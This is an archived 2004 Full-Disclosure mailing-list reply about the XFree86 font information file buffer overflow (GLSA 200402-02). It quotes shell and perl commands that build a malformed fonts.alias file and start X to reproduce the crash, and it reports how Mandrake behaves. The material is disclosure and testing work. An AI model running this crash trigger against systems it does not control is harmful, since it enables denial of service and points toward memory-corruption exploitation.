[Full-Disclosure] Re: [ GLSA 200402-02 ] XFree86 Font Information File Buffer Overflow
From: Evert Daman (linux_at_digipix.org)
Date: 02/12/04
- Previous message: Mandrake Linux Security Team: "[Full-Disclosure] MDKSA-2004:011 - Updated NetPBM packages fix a number of temporary file bugs."
- In reply to: Tim Yamin: "[Full-Disclosure] [ GLSA 200402-02 ] XFree86 Font Information File Buffer Overflow"
- Next in thread: qobaiashi: "Re: [Full-Disclosure] Re: [ GLSA 200402-02 ] XFree86 Font Information File Buffer Overflow"
- Reply: qobaiashi: "Re: [Full-Disclosure] Re: [ GLSA 200402-02 ] XFree86 Font Information File Buffer Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: <full-disclosure@lists.netsys.com> Date: Thu, 12 Feb 2004 08:45:51 +0100
> To reproduce the overflow on the command line, you can run:
>
> # cat > fonts.dir <<EOF
> ~ 1
> ~ word.bdf \
> ~ -misc-fixed-medium-r-semicondensed--13-120-75-75-c-60-iso8859-1
> ~ EOF
> # perl -e 'print "0" x 1024 . "A" x 96 . "\n"' > fonts.alias
> # X :0 -fp $PWD
>
> {Some output removed}... Server aborting... Segmentation fault (core
dumped)
mandrake gives me a:
Fatal server error:
Caught signal 11. Server aborting
no segfault or something...
kind regards,
Evert
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Previous message: Mandrake Linux Security Team: "[Full-Disclosure] MDKSA-2004:011 - Updated NetPBM packages fix a number of temporary file bugs."
- In reply to: Tim Yamin: "[Full-Disclosure] [ GLSA 200402-02 ] XFree86 Font Information File Buffer Overflow"
- Next in thread: qobaiashi: "Re: [Full-Disclosure] Re: [ GLSA 200402-02 ] XFree86 Font Information File Buffer Overflow"
- Reply: qobaiashi: "Re: [Full-Disclosure] Re: [ GLSA 200402-02 ] XFree86 Font Information File Buffer Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
